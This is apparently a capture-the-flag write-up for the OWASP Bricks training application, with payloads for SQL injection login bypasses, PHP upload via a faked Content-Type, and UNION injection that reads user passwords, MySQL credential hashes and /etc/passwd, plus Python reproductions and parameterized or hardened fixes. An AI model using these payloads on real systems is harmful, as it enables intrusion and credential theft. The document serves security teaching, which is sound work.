
OWASP Bricks

May 22, 2021 | CTF

Bricks - Login 1

  • Username: any
  • Password: ' OR '1'='1
  • Resulting Query: SELECT * FROM users WHERE name='aaaaa' and password='' OR '1'='1'
  • AND binds tighter than OR, so the WHERE clause reads (name='aaaaa' and password='') OR '1'='1' and is true for every row; the application logs you in as whichever user comes back first


Bricks - Login 2

  • Open the browser DevTools and remove the onsubmit attribute from the <form ...> element
  • This disables the special-character check, which runs only in the browser; the server never repeats it
  • Username: any
  • Password: ' OR '1'='1
  • Resulting Query: SELECT * FROM users WHERE name='aaaaa' and password='' OR '1'='1'
  • The server-side query is identical to Login 1, so a client-side filter adds nothing; the same request can also be sent directly with a proxy or curl


Bricks - Login 3

  • Username: any
  • Password: ') OR '1'=('1
  • Resulting Query: SELECT * FROM users WHERE name=('aaaa') and password=('') OR '1'=('1') LIMIT 0,1
  • The values are wrapped in parentheses here, so the payload has to close the parenthesis as well as the quote and then leave the trailing ') to be consumed by the end of the injected string


Bricks - Login 4

  • Username: any
  • Password: 1") or 1=1-- -
  • Resulting Query: SELECT * FROM users WHERE name=("1") or 1=1-- -") and password=("1") or 1=1-- -")
  • The values are double-quoted and parenthesized, so the payload closes both; everything after -- - is a comment, so whatever follows the first injected fragment is ignored


Bricks - Login 5

  • Username: 1' or 1=1 #
  • Password: any
  • Resulting Query: SELECT * FROM users WHERE name='1' or 1=1 #' and password = 'ed4fd85ad3da26c458d9263aebd62065'
  • The password is hashed before it is placed in the query (the 32-character hex value above is what reached the database), so quotes typed into the password field never make it into SQL; the injection has to go into the username, and the # comments out the password comparison


Bricks - Login 6

  • Username: any
  • Password: any
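All six login pages are the same bug, user input concatenated into the SQL string, with different quoting around the value. The following Python is an added example and is not code from this write-up or from OWASP Bricks. It rebuilds the query templates shown above for Login 1, 3 and 5 against a small constructed SQLite table (not the real Bricks schema), checks that the page's payloads return rows, shows why the hashed password field of Login 5 is not injectable while its username is, and contrasts a parameterized query. SQLite has no # comment, so the Login 5 payload is written here with -- - instead; that substitution and the table layout are assumptions of the example.

```python
import hashlib
import sqlite3

# Constructed stand-in for the Bricks users table; passwords are stored in clear
# for brevity, since only the query shapes matter for what is shown here.
def make_login_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (idusers INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    db.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                   [("tom", "tom-pw"), ("jim", "jim-pw")])
    return db

# Query templates as the write-up shows them for Login 1, 3 and 5.
TEMPLATES = {
    "login1": "SELECT * FROM users WHERE name='{u}' and password='{p}'",
    "login3": "SELECT * FROM users WHERE name=('{u}') and password=('{p}') LIMIT 0,1",
    "login5": "SELECT * FROM users WHERE name='{u}' and password = '{p}'",
}

def vulnerable_login(db, level, username, password):
    """Bricks-style string-built query. Returns the names of the rows it matched;
    a non-empty list means the login 'succeeded'."""
    if level == "login5":
        # Login 5 hashes the password before it reaches the query. Whatever is typed
        # into the password field becomes 32 hex digits, so quotes there never reach
        # SQL and only the username is injectable.
        password = hashlib.md5(password.encode()).hexdigest()
    sql = TEMPLATES[level].format(u=username, p=password)
    return sorted(row[1] for row in db.execute(sql))

def safe_login(db, username, password):
    """Parameterized query: the same payloads are compared as data, not parsed as SQL."""
    sql = "SELECT * FROM users WHERE name=? and password=?"
    return sorted(row[1] for row in db.execute(sql, (username, password)))

if __name__ == "__main__":
    db = make_login_db()
    print(vulnerable_login(db, "login1", "aaaaa", "' OR '1'='1"))   # every user
    print(vulnerable_login(db, "login3", "aaaa", "') OR '1'=('1"))  # first user only (LIMIT 0,1)
    print(vulnerable_login(db, "login5", "any", "1' or 1=1 -- -"))  # nothing: the payload was hashed
    print(vulnerable_login(db, "login5", "1' or 1=1 -- -", "any"))  # every user
    print(safe_login(db, "aaaaa", "' OR '1'='1"))                   # nothing
```

The Login 2 check is the same template as Login 1 behind a browser-side filter, so it needs no separate function: the server sees exactly the Login 1 query once the filter is bypassed.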


Bricks - File Upload pages 1

  • Make a PHP file containing the code snippet <?php echo phpversion() ?> and upload it
  • Open the uploaded file at /owaspbricks/upload-1/uploads/<filename>.php in the browser; the server executes it and displays the PHP version, which confirms code execution in the web root


Bricks - File Upload pages 2

  • Upload the PHP file from the first challenge; the website responds with the error "Upload failed"
  • Open the Network tab in the browser DevTools and select the most recent index.php request
  • Use "Edit and Resend": in the multipart request body, change the file part's header Content-Type: application/x-php to Content-Type: image/png and resend
  • The Response tab now shows the upload path: the server only checks the client-declared Content-Type, which says nothing about what the file actually contains


Bricks - File Upload pages 3

  • Same bypass as File Upload pages 2: change the declared Content-Type of the file part and resend
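Upload pages 2 and 3 both trust the Content-Type header that the client writes into the multipart part. The Python below is an added example, not code from the write-up or from OWASP Bricks: it builds the multipart body that "Edit and Resend" produces, parses the file part out again, applies a check that mirrors the behaviour described above (declared type decides), and beside it a hardened check that ignores the declared type, allow-lists the extension, verifies the file's magic bytes and assigns a random stored name. The field name userfile, the boundary and the magic-byte table are assumptions of the example.

```python
import os
import re
import secrets

# Allow-list: extension -> leading bytes the file body must start with (assumed set).
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED = {".png": PNG_MAGIC, ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff", ".gif": b"GIF8"}

def build_multipart(filename, content_type, data, boundary="----bricksboundary"):
    """Constructed multipart/form-data body with a single file part, the way a
    browser (or DevTools 'Edit and Resend') would send it."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="userfile"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + data + tail

def parse_file_part(body, boundary="----bricksboundary"):
    """Minimal parser: returns (filename, declared Content-Type, file bytes)."""
    for part in body.split(f"--{boundary}".encode()):
        if b"filename=" not in part:
            continue
        headers, _, data = part.partition(b"\r\n\r\n")
        filename = re.search(rb'filename="([^"]*)"', headers).group(1).decode()
        ctype = re.search(rb"Content-Type:\s*([^\r\n]+)", headers).group(1).decode()
        return filename, ctype, data[:-2] if data.endswith(b"\r\n") else data
    raise ValueError("no file part in body")

def accept_by_declared_type(filename, declared_type, data):
    """Upload 2/3 as the write-up describes them: the client-declared type decides.
    Renaming the type to image/png is enough to get shell.php stored."""
    return declared_type in ("image/png", "image/jpeg", "image/gif")

def accept_hardened(filename, declared_type, data):
    """Ignore the declared type entirely: the extension must be allow-listed and
    the body must start with the magic bytes for that extension."""
    ext = os.path.splitext(filename)[1].lower()
    magic = ALLOWED.get(ext)
    return magic is not None and data.startswith(magic)

def stored_name(filename):
    """Never reuse the client's file name: random name plus the allow-listed
    extension, so a .php (or .php.png) name cannot reach the web root."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    return secrets.token_hex(16) + ext

if __name__ == "__main__":
    php = b"<?php echo phpversion() ?>"
    name, ctype, data = parse_file_part(build_multipart("shell.php", "image/png", php))
    print("declared-type check:", accept_by_declared_type(name, ctype, data))  # True: bypassed
    print("hardened check:     ", accept_hardened(name, ctype, data))          # False
```

Magic-byte checks stop this particular bypass but not a polyglot (a valid PNG with PHP appended), which is why the random name with a fixed extension and storage outside the web root matter as much as the content check.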


Bricks - Content pages 1

  • The page looks up a user by the ID in the URL parameter, so you can iterate through all users simply by incrementing it
  • You can read any database content using UNION. The original SELECT returns 8 columns, so the injected SELECT must supply 8; "and 1=2" suppresses the legitimate row so the UNION row is what the page displays:

    - read user passwords (the WHERE on the UNION picks which user's row comes back)
    id=1 and 1=2 union select name,password,idusers,4,5,6,7,8 from users where idusers=0 -- -
    
    - read the MySQL username and password hash (mysql.user has a password column up to MySQL 5.6; from 5.7 it is authentication_string)
    id=1 and 1=2 union select User(),password,3,4,5,6,7,8 from mysql.user -- -
    
    - read /etc/passwd (0x2f6574632f706173737764 is the hex encoding of /etc/passwd, which avoids quotes; load_file() needs the FILE privilege and a secure_file_priv setting that allows the path)
    id=1 and 1=2 union select load_file(0x2f6574632f706173737764),2,3,4,5,6,7,8 from mysql.user -- -

  • In MySQL, "--" only starts a comment when followed by whitespace, which a URL tends to lose, hence the "-- -" form at the end of each payload


Bricks - Content pages 2

  • Content pages 2 is very similar: swap id=1 for user=tom and append -- - at the end (if the query quotes the user name, the payload has to close that quote before the UNION)


Bricks - Content pages 3

  • Content pages 3 only differs by sending the injection string in the POST body instead of the URL


Bricks - Content pages 4

  • Content pages 4 reads the injection string from the User-Agent request header, so it has to be set with "Edit and Resend" or a proxy


Bricks - Content pages 5

  • Content pages 5 reads the injection string from the USER cookie


Bricks - Content pages 6

  • Content pages 6 is identical to 1 except that the id parameter is base64-encoded: encode the whole injection string and send the result as id
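Content pages 1 to 6 are one UNION injection reached through six transports. The Python below is an added example, not code from the write-up or from OWASP Bricks, covering Content pages 1 and 6: it assumes the page runs SELECT * FROM users WHERE idusers=<id> against a constructed 8-column SQLite table (the write-up shows only the payloads, so the query shape and column names are assumptions), finds the column count automatically instead of hard-coding the 3..8 filler, dumps credentials with "and 1=2 union select ...", wraps the same payload in base64 for page 6, and shows the fix: cast the id and bind it.

```python
import base64
import sqlite3

def make_content_db():
    """Constructed stand-in for the Bricks users table with the 8 columns the
    write-up's payloads imply; column names beyond the first four are invented."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (idusers INTEGER PRIMARY KEY, name TEXT, email TEXT, "
        "password TEXT, col5 TEXT, col6 TEXT, col7 TEXT, col8 TEXT)"
    )
    db.executemany(
        "INSERT INTO users VALUES (?,?,?,?,?,?,?,?)",
        [(1, "tom", "tom@example.com", "tom-pw", "", "", "", ""),
         (2, "jim", "jim@example.com", "jim-pw", "", "", "", "")],
    )
    return db

def content_page(db, id_param):
    """Assumed shape of the Content pages 1 query: the id is concatenated unquoted."""
    sql = f"SELECT * FROM users WHERE idusers={id_param}"
    return db.execute(sql).fetchall()

def encode_id_for_page_6(payload):
    """Content pages 6 transport: the whole injection string, base64-encoded."""
    return base64.b64encode(payload.encode()).decode()

def content_page_6(db, id_b64):
    """Content pages 6: same query, the id just arrives base64-encoded."""
    return content_page(db, base64.b64decode(id_b64).decode())

def count_columns(page, max_cols=20):
    """Grow a UNION SELECT of NULLs until the database stops rejecting the
    column-count mismatch; generalises the fixed ',3,4,5,6,7,8' filler."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            page(f"1 and 1=2 union select {nulls} -- -")
            return n
        except sqlite3.OperationalError:
            continue
    return None

def dump_credentials(page, ncols):
    """'and 1=2' removes the legitimate row, so only UNION rows come back and
    name/password land in the first two displayed columns."""
    filler = "".join(f",{i}" for i in range(3, ncols + 1))
    rows = page(f"1 and 1=2 union select name,password{filler} from users -- -")
    return sorted((r[0], r[1]) for r in rows)

def safe_content_page(db, id_param):
    """Fix: enforce the type, then bind the value; the payload is rejected as a
    non-integer before it can touch the statement."""
    uid = int(id_param)  # raises ValueError for anything that is not an integer
    return db.execute("SELECT * FROM users WHERE idusers=?", (uid,)).fetchall()

if __name__ == "__main__":
    db = make_content_db()
    page = lambda p: content_page(db, p)
    ncols = count_columns(page)
    print("columns:", ncols)
    print("credentials:", dump_credentials(page, ncols))
    payload = "1 and 1=2 union select name,password,3,4,5,6,7,8 from users -- -"
    print("via page 6:", content_page_6(db, encode_id_for_page_6(payload))[:1])
```

The same count_columns/dump_credentials pair applies to pages 2 to 5 unchanged; only the function that delivers the string (URL, POST body, User-Agent header, USER cookie) differs, which is the point of those four pages.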